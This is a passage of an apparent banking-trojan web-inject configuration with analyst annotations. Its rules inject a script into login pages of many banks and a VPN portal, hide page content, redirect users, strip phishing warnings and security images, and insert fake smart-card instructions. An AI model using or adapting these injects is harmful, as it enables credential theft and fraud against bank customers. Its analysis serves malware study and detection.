        <!-- A span-like element with class "message" whose text begins with "Reminder" has its class attribute and text removed, leaving an empty element. The pattern has only the "i" modifier, so the dot presumably does not cross line breaks and the match is greedy (assumes PCRE-style flags). -->
  2549. <modify>
  2550. <pattern modifiers="i"><![CDATA[ class="message">Reminder.*</span>]]></pattern>
  2551. <replacement><![CDATA[></span>]]></replacement>
  2552. </modify>
  2553. </actions>
  2554. </httpinject>
  2555. <httpinject>
        <!-- Analyst note: the URL pattern allows arbitrary text between https:// and business.lloydsbank.co.uk/business, and its modifiers attribute is empty, so matching is presumably case-sensitive (assumes PCRE-style flags). NOTE(review): because of the leading wildcard the rule is not tied to a fixed host name. The action appends a script element (relative src scripts/webcticker.js) after the closing form tag; the script is not part of this listing. -->
  2556. <conditions>
  2557. <url type="allow" onpost="1" onget="1" modifiers="">^https://.*business\.lloydsbank\.co\.uk/business
  2558. </url>
  2559. </conditions>
  2560. <actions>
  2561. <modify>
  2562. <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
  2563. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
  2564. </modify>
  2565. </actions>
  2566. </httpinject>
  2567. <httpinject>
        <!-- Analyst note: the host requires at least one digit after bbank, and the path is the ifdlm-web login.ctl page on ybonline.co.uk. The action appends a script element (relative src scripts/webcticker.js) after the closing form tag; the script is not part of this listing. -->
  2568. <conditions>
  2569. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://bbank\d+\.ybonline\.co\.uk/ifdu/ifdlm\-web/login\.ctl</url>
  2570. </conditions>
  2571. <actions>
  2572. <modify>
  2573. <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
  2574. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
  2575. </modify>
  2576. </actions>
  2577. </httpinject>
  2578. <httpinject>
  2579. <conditions>
  2580. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://home\d+\.ybonline.co\.uk/ralu/reglm\-web/login\.ctl</url>
  2581. </conditions>
  2582. <actions>
  2583. <modify>
  2584. <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
  2585. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
  2586. </modify>
  2587. </actions>
  2588. </httpinject>
  2589. <httpinject>
        <!-- Web-inject rule for the Barclays ibank logon path (URL condition below).
             Action 1 matches the opening <head ...> tag and appends three things after it:
             a style rule that sets the body to visibility:hidden, the scripts/webcticker.js
             include, and an inline timer that makes the body visible again after 5000 ms.
             The page therefore stays blank for up to five seconds, presumably to give the
             injected script time to run before the user sees anything.
             Action 2 replaces everything from "Your security obligations" up to the next
             <script with attacker-written wording that tells the user to keep the smart card
             inserted in the card reader. That instruction comes from this config, not from
             the bank. Analyst note: user reports of this exact wording, or of a delayed
             blank logon page, are indicators of this inject. -->
  2590. <conditions>
  2591. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://ibank\d*\.bib\.barclays\.com/logon/
  2592. </url>
  2593. </conditions>
  2594. <actions>
  2595. <modify>
  2596. <pattern modifiers="msU"><![CDATA[(\<head.*\>)]]></pattern>
  2597. <replacement><![CDATA[\1
  2598. <style type="text/css">
  2599. body {visibility: hidden; }
  2600. </style>
  2601. <script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>
  2602. <script type="text/javascript">setTimeout(function(){document.body.style.visibility = 'visible';}, 5000);</script>
  2603. ]]></replacement>
  2604. </modify>
  2605. <modify>
  2606. <pattern modifiers="msU"><![CDATA[Your security obligations.*<script]]></pattern>
  2607. <replacement><![CDATA[Your security obligations</p></td></tr><tr/><tr/><tr><td width="10%"/><td class="bodytext" colspan="1"><p>Due to our recent security changes you should <b>keep your smart card inserted in your card reader</b>. </p><p>This security message will appear periodically.</p><p>Please tick the box to acknowledge these security obligations.</p></td><td width="40%"/></tr></table><script]]></replacement>
  2608. </modify>
  2609. </actions>
  2610. </httpinject>
  2611. <httpinject>
  2612. <conditions>
  2613. <url type="allow" onpost="1" onget="1" modifiers="">^https://online\-business\.tsb\.co\.uk/business/logon/login\.jsp</url>
  2614. </conditions>
  2615. <actions>
  2616. <modify>
  2617. <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
  2618. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
  2619. </modify>
  2620. </actions>
  2621. </httpinject>
  2622. <httpinject>
  2623. <conditions>
  2624. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://home\d+\.cbonline.co\.uk/ralu.*/reglm\-web/login\.ctl
  2625. </url>
  2626. </conditions>
  2627. <actions>
  2628. <modify>
  2629. <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
  2630. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
  2631. </modify>
  2632. </actions>
  2633. </httpinject>
  2634. <httpinject>
  2635. <conditions>
  2636. <url type="allow" onpost="1" onget="1" modifiers="U">^https://www\.business\.hsbc\.co\.uk/1/2/</url>
  2637. </conditions>
  2638. <actions>
  2639. <modify>
  2640. <pattern modifiers="msU"><![CDATA[(class\="hsbcContent.+</div>)]]></pattern>
  2641. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
  2642. </modify>
  2643. </actions>
  2644. </httpinject>
  2645. <httpinject>
  2646. <conditions>
  2647. <url type="allow" onpost="1" onget="1" modifiers="">^https://clientlogin\.ibb\.ubs\.com/login(\?|$)</url>
  2648. </conditions>
  2649. <actions>
  2650. <modify>
  2651. <pattern modifiers="Ui"><![CDATA[(</form>)]]></pattern>
  2652. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
  2653. </modify>
  2654. </actions>
  2655. <httpinject>
        <!-- Web-inject rule with three URL conditions on www<digits>.secure.hsbcnet.com: the
             IDV_OTP_CHALLENGE and IDV_CAM10_AUTHENTICATION portal pages and the usernameInput
             logon page. Action 1 inserts the scripts/webcticker.js include immediately before
             the closing </body> tag (the \1 back-reference comes after the script here).
             Action 2 has an empty replacement, so a paragraph of class "required" starting
             with "Important Reminder" is deleted from the page. The reminder's wording is not
             shown in this config; presumably it is a security notice. Analyst note: the
             absence of that paragraph on these pages is a visible symptom of the inject. -->
  2656. <conditions>
  2657. <url type="allow" onpost="1" onget="1" modifiers="">^https://www\d*\.secure\.hsbcnet\.com/uims/portal/IDV\_OTP\_CHALLENGE(;|$)</url>
  2658. <url type="allow" onpost="1" onget="1" modifiers="">^https://www\d*\.secure\.hsbcnet\.com/uims/portal/IDV\_CAM10\_AUTHENTICATION(;|$)</url>
  2659. <url type="allow" onpost="1" onget="1" modifiers="">^https://www\d*\.secure\.hsbcnet\.com/uims/content/public/hibm/logon/usernameInput.+</url>
  2660. </conditions>
  2661. <actions>
  2662. <modify>
  2663. <pattern modifiers=""><![CDATA[(</body>)]]></pattern>
  2664. <replacement><![CDATA[<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>\1]]></replacement>
  2665. </modify>
  2666. <modify>
  2667. <pattern modifiers=""><![CDATA[<p class="required">Important Reminder.*</p>]]></pattern>
  2668. <replacement><![CDATA[]]></replacement>
  2669. </modify>
  2670. </actions>
  2671. </httpinject>
  2673. <httpinject>
        <!-- Web-inject rule for the plain-HTTP logon.html page on www<digits>.secure.hsbcnet.com
             (the condition is http://, unlike the https:// conditions elsewhere in this config).
             The single action appends, after the <head> tag, a style rule that hides the body
             and an inline script that sets top.location.href to the HTTPS
             IDV_CAM10_AUTHENTICATION URL on www2.secure.hsbcnet.com. That target fits one of
             the URL conditions of another hsbcnet rule in this config, the one that adds the
             scripts/webcticker.js include, so this rule appears to steer the user onto a page
             where that inject applies. No script include is added by this rule itself. -->
  2674. <conditions>
  2675. <url type="allow" onpost="1" onget="1" modifiers="">^http://www\d*\.secure\.hsbcnet\.com/uims/content/public/hibm/logon/logon\.html</url>
  2676. </conditions>
  2677. <actions>
  2678. <modify>
  2679. <pattern modifiers=""><![CDATA[(<head>)]]></pattern>
  2680. <replacement><![CDATA[\1
  2681. <style>
  2682. body {display:none;}
  2683. </style>
  2684. <script type="text/javascript" language="JavaScript">
  2685. top.location.href = 'https://www2.secure.hsbcnet.com/uims/portal/IDV_CAM10_AUTHENTICATION';
  2686. </script>]]></replacement>
  2687. </modify>
  2688. </actions>
  2689. </httpinject>
  2690. <httpinject>
        <!-- Web-inject rule for the login.aspx / default.aspx pages on www.rbsdigital.com.
             Action 1 appends the scripts/webcticker.js include after the closing </form> tag.
             Action 2 adds style="display:none;" to the element carrying
             class="frame securityImage", so that element is no longer rendered. Judging by the
             class name it is the page's security image, presumably an anti-phishing cue (to be
             confirmed against the genuine page). Analyst note: a logon page on which that
             element is present in the DOM but hidden is a symptom of this inject. -->
  2691. <conditions>
  2692. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://www\.rbsdigital\.com/(login|default)\.aspx
  2693. </url>
  2694. </conditions>
  2695. <actions>
  2696. <modify>
  2697. <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
  2698. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
  2699. </modify>
  2700. <modify>
  2701. <pattern modifiers="i"><![CDATA[(class="frame securityImage")]]></pattern>
  2702. <replacement><![CDATA[\1 style="display:none;"]]></replacement>
  2703. </modify>
  2704. </actions>
  2705. </httpinject>
  2706. <httpinject>
  2707. <conditions>
  2708. <url type="allow" onpost="1" onget="1" modifiers="U">^https://www\.integrator\.barclays\.com/idc/html/LoginStep1\.html</url>
  2709. </conditions>
  2710. <actions>
  2711. <modify>
  2712. <pattern modifiers="Ui"><![CDATA[(</body>)]]></pattern>
  2713. <replacement><![CDATA[<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>\1]]></replacement>
  2714. </modify>
  2715. </actions>
  2716. </httpinject>
  2717. <httpinject>
  2718. <conditions>
  2719. <url type="allow" onpost="1" onget="1" modifiers="">^https://www\.commercial\.hsbc\.com\.hk/1/2/.+</url>
  2720. </conditions>
  2721. <actions>
  2722. <modify>
  2723. <pattern modifiers="sAi"><![CDATA[(.+</body>)]]></pattern>
  2724. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
  2725. </modify>
  2726. </actions>
  2727. </httpinject>
  2728. <httpinject>
  2729. <conditions>
  2730. <url type="allow" onpost="1" onget="1" modifiers="">^https://internet\-banking\.hk\.dbs\.com/IB/Welcome(\?|$)</url>
  2731. <url type="allow" onpost="1" onget="1" modifiers="">^https://internet\-banking\.dbs\.com\.sg/IB/Welcome(\?|$)</url>
  2732. </conditions>
  2733. <actions>
  2734. <modify>
  2735. <pattern modifiers="Ui"><![CDATA[(</form>)]]></pattern>
  2736. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
  2737. </modify>
  2738. </actions>
  2739. </httpinject>
  2740. <httpinject>
  2741. <conditions>
  2742. <url type="allow" onpost="1" onget="1" modifiers="i">^https://apib\d*\.anz\.com/apinetbank/(Startup|LoginEsInetANZ)\.aspx(\?|$)</url>
  2743. </conditions>
  2744. <actions>
  2745. <modify>
  2746. <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
  2747. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
  2748. </modify>
  2749. </actions>
  2750. </httpinject>
  2751. <httpinject>
  2752. <conditions>
  2753. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://cib\.affinonline\.com/business/login\.html</url>
  2754. </conditions>
  2755. <actions>
  2756. <modify>
  2757. <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
  2758. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
  2759. </modify>
  2760. </actions>
  2761. </httpinject>
  2762. <httpinject>
  2763. <conditions>
  2764. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://ibank\.agribank\.com\.vn/ibank/index\.jsp</url>
  2765. </conditions>
  2766. <actions>
  2767. <modify>
  2768. <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
  2769. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
  2770. </modify>
  2771. </actions>
  2772. </httpinject>
  2773. <httpinject>
  2774. <conditions>
  2775. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://www\.allianceonline\.net\.my/Corporate/welcome\.htm</url>
  2776. </conditions>
  2777. <actions>
  2778. <modify>
  2779. <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
  2780. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
  2781. </modify>
  2782. </actions>
  2783. <httpinject>
        <!-- Web-inject rule whose URL condition stops at the host name
             (ambank.amonline.com.my) with no path component, so it matches every HTTPS page
             on that host rather than a single logon page. The action appends the
             scripts/webcticker.js include after the closing </html> tag, i.e. outside the
             document element, instead of after </form> as most entries in this config do. -->
  2784. <conditions>
  2785. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://ambank\.amonline\.com\.my</url>
  2786. </conditions>
  2787. <actions>
  2788. <modify>
  2789. <pattern modifiers="i"><![CDATA[(</html>)]]></pattern>
  2790. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
  2791. </modify>
  2792. </actions>
  2793. </httpinject>
  2795. <httpinject>
  2796. <conditions>
  2797. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://www\.amesecurities\.com\.my/gc/main\.jsp</url>
  2798. </conditions>
  2799. <actions>
  2800. <modify>
  2801. <pattern modifiers="i"><![CDATA[(</html>)]]></pattern>
  2802. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
  2803. </modify>
  2804. </actions>
  2805. </httpinject>
  2806. <httpinject>
  2807. <conditions>
  2808. <url type="allow" onpost="1" onget="1" modifiers="">^https://cib\.bochk\.com/login/fis/cib\_login012\_.*\.jsp(\?|$)</url>
  2809. </conditions>
  2810. <actions>
  2811. <modify>
  2812. <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
  2813. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
  2814. </modify>
  2815. </actions>
  2816. </httpinject>
  2817. <httpinject>
  2818. <conditions>
  2819. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://ibank\.bri\.co\.id/cms/</url>
  2820. </conditions>
  2821. <actions>
  2822. <modify>
  2823. <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
  2824. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
  2825. </modify>
  2826. </actions>
  2827. </httpinject>
  2828. <httpinject>
  2829. <conditions>
  2830. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://bizibanking\.bangkokbank\.com/bblamsui/Signon.*\.aspx</url>
  2831. </conditions>
  2832. <actions>
  2833. <modify>
  2834. <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
  2835. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
  2836. </modify>
  2837. </actions>
  2838. </httpinject>
  2839. <httpinject>
  2840. <conditions>
  2841. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://www\.bankislam\.biz/rib/login/index</url>
  2842. </conditions>
  2843. <actions>
  2844. <modify>
  2845. <pattern modifiers="i"><![CDATA[(</html>)]]></pattern>
  2846. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
  2847. </modify>
  2848. </actions>
  2849. </httpinject>
  2850. <httpinject>
  2851. <conditions>
  2852. <url type="allow" onpost="1" onget="1" modifiers="">^https://cib\.bochk\.com/login/cib\_login012\_.*\.jsp(\?|$)</url>
  2853. </conditions>
  2854. <actions>
  2855. <modify>
  2856. <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
  2857. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
  2858. </modify>
  2859. </actions>
  2860. </httpinject>
  2861. <httpinject>
  2862. <conditions>
  2863. <url type="allow" onpost="1" onget="1" modifiers="">^https://eb\.bankcomm\.com\.hk/eb/login\.action(\?|$)</url>
  2864. </conditions>
  2865. <actions>
  2866. <modify>
  2867. <pattern modifiers="sA"><![CDATA[(.+</form>)]]></pattern>
  2868. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
  2869. </modify>
  2870. </actions>
  2871. </httpinject>
  2872. <httpinject>
  2873. <conditions>
  2874. <url type="allow" onpost="1" onget="1" modifiers="">^https://biz\.hkbea\-cyberbanking\.com/servlet/MA01Show(\?|$)</url>
  2875. </conditions>
  2876. <actions>
  2877. <modify>
  2878. <pattern modifiers="sA"><![CDATA[(.+</form>)]]></pattern>
  2879. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
  2880. </modify>
  2881. </actions>
  2882. </httpinject>
  2883. <httpinject>
  2884. <conditions>
  2885. <url type="allow" onpost="1" onget="1" modifiers="Ui">^https://private\.bankofsingapore\.com/IPBWBWeb/Login/.+\.aspx(\?|$)</url>
  2886. </conditions>
  2887. <actions>
  2888. <modify>
  2889. <pattern modifiers="Ui"><![CDATA[(</form>)]]></pattern>
  2890. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
  2891. </modify>
  2892. </actions>
  2893. </httpinject>
  2894. <httpinject>
  2895. <conditions>
  2896. <url type="allow" onpost="1" onget="1" modifiers="i">^https://www\.bizchannel\.cimb\.com\.sg/corp/common\d*/login\.do(\?|$)</url>
  2897. </conditions>
  2898. <actions>
  2899. <modify>
  2900. <pattern modifiers="i"><![CDATA[(</body>)]]></pattern>
  2901. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
  2902. </modify>
  2903. </actions>
  2904. </httpinject>
  2905. <httpinject>
  2906. <conditions>
  2907. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://www\.ebanking\.cimbthai\.com/cash/logon\.jsp</url>
  2908. </conditions>
  2909. <actions>
  2910. <modify>
  2911. <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
  2912. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
  2913. </modify>
  2914. </actions>
  2915. </httpinject>
  2916. <httpinject>
        <!-- Web-inject rule for the Citibank Singapore business sign-on page
             (DisplayCinSignon.do). Action 1 captures everything up to a closing </form> tag
             and appends the scripts/webcticker.js include after it.
             Action 2 targets the block that starts with <b>PHISHING ALERT</b> and has an empty
             <replacement />, so the bank's own phishing warning is stripped from the page.
             The pattern wraps that block in a named group, "inject"; presumably only the named
             group is replaced rather than the whole match, but the replacement engine is not
             visible here, so confirm before relying on that.
             Analyst note: a sign-on page served without its PHISHING ALERT block is a symptom
             of this inject. -->
  2917. <conditions>
  2918. <url type="allow" onpost="1" onget="1" modifiers="">^https://www\.citibusiness\.citibank\.com\.sg/SGCBZ/JSO/signon/DisplayCinSignon\.do(\?|$)</url>
  2919. </conditions>
  2920. <actions>
  2921. <modify>
  2922. <pattern modifiers="sA"><![CDATA[(.+</form>)]]></pattern>
  2923. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
  2924. </modify>
  2925. <modify>
  2926. <pattern modifiers="sA"><![CDATA[.+(?<inject><b>PHISHING ALERT</b>.+?</font>.+?)</font>]]></pattern>
  2927. <replacement />
  2928. </modify>
  2929. </actions>
  2930. </httpinject>
  2931. <httpinject>
  2932. <conditions>
  2933. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://www\.citibank\.com\.my/MYGCB/JPS/portal/Index\.do</url>
  2934. </conditions>
  2935. <actions>
  2936. <modify>
  2937. <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
  2938. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
  2939. </modify>
  2940. </actions>
  2941. </httpinject>
  2942. <httpinject>
  2943. <conditions>
  2944. <url type="allow" onpost="1" onget="1" modifiers="">^https://www\.credit\-suisse\.com\.sg/amserver/UI/Login(\?|$)</url>
  2945. </conditions>
  2946. <actions>
  2947. <modify>
  2948. <pattern modifiers="Ui"><![CDATA[(</form>)]]></pattern>
  2949. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
  2950. </modify>
  2951. </actions>
  2952. </httpinject>
  2953. <httpinject>
  2954. <conditions>
  2955. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://ideal\.dbs\.com/loginSubscriber/login/(SubscriberLoginServlet|pin\.jsp)</url>
  2956. </conditions>
  2957. <actions>
  2958. <modify>
  2959. <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
  2960. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
  2961. </modify>
  2962. </actions>
  2963. </httpinject>
  2964. <httpinject>
  2965. <conditions>
  2966. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://.*\.directnet\.com/dn/c/cls/auth</url>
  2967. </conditions>
  2968. <actions>
  2969. <modify>
  2970. <pattern modifiers=""><![CDATA[(</form>)]]></pattern>
  2971. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
  2972. </modify>
  2973. </actions>
  2974. </httpinject>
  2975. <httpinject>
  2976. <conditions>
  2977. <url type="allow" onpost="1" onget="1" modifiers="">^https://www\.fbo\.fubonbank\.com\.hk/fboPortal/index\_e\.jsp(\?|$)</url>
  2978. </conditions>
  2979. <actions>
  2980. <modify>
  2981. <pattern modifiers="Ui"><![CDATA[(</form>)]]></pattern>
  2982. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
  2983. </modify>
  2984. </actions>
  2985. </httpinject>
  2986. <httpinject>
  2987. <conditions>
  2988. <url type="allow" onpost="1" onget="1" modifiers="">^https://www\.hsbc\.com\.cn/1/2/.+</url>
  2989. </conditions>
  2990. <actions>
  2991. <modify>
  2992. <pattern modifiers="sAi"><![CDATA[(.+</body>)]]></pattern>
  2993. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
  2994. </modify>
  2995. </actions>
  2996. </httpinject>
  2997. <httpinject>
  2998. <conditions>
  2999. <url type="allow" onpost="1" onget="1" modifiers="">^https://www\.hsbc\.com\.sg/1/2/.+</url>
  3000. </conditions>
  3001. <actions>
  3002. <modify>
  3003. <pattern modifiers="sAi"><![CDATA[(.+</body>)]]></pattern>
  3004. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
  3005. </modify>
  3006. </actions>
  3007. </httpinject>
  3008. <httpinject>
  3009. <conditions>
  3010. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://www\.hsbc\.com\.vn/1/2/</url>
  3011. </conditions>
  3012. <actions>
  3013. <modify>
  3014. <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
  3015. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
  3016. </modify>
  3017. </actions>
  3018. </httpinject>
  3019. <httpinject>
  3020. <conditions>
  3021. <url type="allow" onpost="1" onget="1" modifiers="U">^https://ebusiness\.hangseng\.com/1/2/</url>
  3022. </conditions>
  3023. <actions>
  3024. <modify>
  3025. <pattern modifiers="sAi"><![CDATA[(.+</form>)]]></pattern>
  3026. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
  3027. </modify>
  3028. </actions>
  3029. </httpinject>
  3030. <httpinject>
  3031. <conditions>
  3032. <url type="allow" onpost="1" onget="1" modifiers="">^https://ebank\.eonbank\.com\.my/cashmgmt/security/commonLogin\.jsp($|\?)</url>
  3033. </conditions>
  3034. <actions>
  3035. <modify>
  3036. <pattern modifiers="Ui"><![CDATA[(</form>)]]></pattern>
  3037. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
  3038. </modify>
  3039. </actions>
  3040. </httpinject>
  3041. <httpinject>
  3042. <conditions>
  3043. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://www\.hongleongonline\.com\.my/business/public/main\.html</url>
  3044. </conditions>
  3045. <actions>
  3046. <modify>
  3047. <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
  3048. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
  3049. </modify>
  3050. </actions>
  3051. </httpinject>
  3052. <httpinject>
  3053. <conditions>
  3054. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://ibps\.hpb\.hr/HPB\.iBank\.IBPS\.Web/login\.iface</url>
  3055. </conditions>
  3056. <actions>
  3057. <modify>
  3058. <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
  3059. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
  3060. </modify>
  3061. </actions>
  3062. </httpinject>
  3063. <httpinject>
  3064. <conditions>
  3065. <url type="allow" onpost="1" onget="1" modifiers="U">^https://ibank\.hncb\.com\.hk/netbank/pages/jsp/HKLogin/html/HKLogin\_en\.jsp(\?|$)</url>
  3066. </conditions>
  3067. <actions>
  3068. <modify>
  3069. <pattern modifiers="sA"><![CDATA[(.+</form>)]]></pattern>
  3070. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
  3071. </modify>
  3072. </actions>
  3073. </httpinject>
  3074. <httpinject>
  3075. <conditions>
  3076. <url type="allow" onpost="1" onget="1" modifiers="">^https://cib\.icicibank\.com\.sg/CIBSGAPP/BANKAWAY(\?|$)</url>
  3077. </conditions>
  3078. <actions>
  3079. <modify>
  3080. <pattern modifiers="sA"><![CDATA[(.+</form>)]]></pattern>
  3081. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
  3082. </modify>
  3083. </actions>
  3084. </httpinject>
  3085. <httpinject>
  3086. <conditions>
  3087. <url type="allow" onpost="1" onget="1" modifiers="">^https://(corpebankasia|corpebank)\.icbc\.com\.cn/icbc/corporbank/index.*\.jsp(\?|$)</url>
  3088. </conditions>
  3089. <actions>
  3090. <modify>
  3091. <pattern modifiers="isA"><![CDATA[(.+</form>)]]></pattern>
  3092. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
  3093. </modify>
  3094. </actions>
  3095. </httpinject>
  3096. <httpinject>
  3097. <conditions>
  3098. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://ebank\.kasikornbankgroup\.com/kbiznet/login.*\.html</url>
  3099. </conditions>
  3100. <actions>
  3101. <modify>
  3102. <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
  3103. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
  3104. </modify>
  3105. </actions>
  3106. </httpinject>
  3107. <httpinject>
  3108. <conditions>
  3109. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://ws\d+\.kasikornbank\.com/baliweb/\d+/site/defaultskin/.*/html/static/logon\.htm</url>
  3110. </conditions>
  3111. <actions>
  3112. <modify>
  3113. <pattern modifiers="i"><![CDATA[(</body>)]]></pattern>
  3114. <replacement><![CDATA[<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>\1]]></replacement>
  3115. </modify>
  3116. </actions>
  3117. <httpinject>
        <!-- Web-inject rule whose URL condition covers every page under https://www.kbc.be/.
             The narrowing happens in the body pattern instead: the action only fires when the
             response contains a <form> with id="ID_LOGONFORM", and then appends the
             scripts/webcticker.js include after that form's closing tag. Pages on the host
             without that form are left unmodified by this rule. -->
  3118. <conditions>
  3119. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://www\.kbc\.be/</url>
  3120. </conditions>
  3121. <actions>
  3122. <modify>
  3123. <pattern modifiers="isU"><![CDATA[(<form.*id="ID_LOGONFORM".*</form>)]]></pattern>
  3124. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
  3125. </modify>
  3126. </actions>
  3127. </httpinject>
  3129. <httpinject>
        <!-- Web-inject rule that stands out from its neighbours: the host is named "vpn" and
             the path /+CSCOE+/logon.html is the one used by Cisco ASA clientless SSL VPN login
             portals, so this entry targets a remote-access logon page rather than an
             online-banking site. The action is the same as for the banking entries: the
             scripts/webcticker.js include is appended after the closing </form> tag.
             Analyst note: triage of this config should cover VPN credentials on infected
             hosts, not only banking credentials. -->
  3130. <conditions>
  3131. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://vpn\.tarumanagara\.com/\+CSCOE\+/logon\.html</url>
  3132. </conditions>
  3133. <actions>
  3134. <modify>
  3135. <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
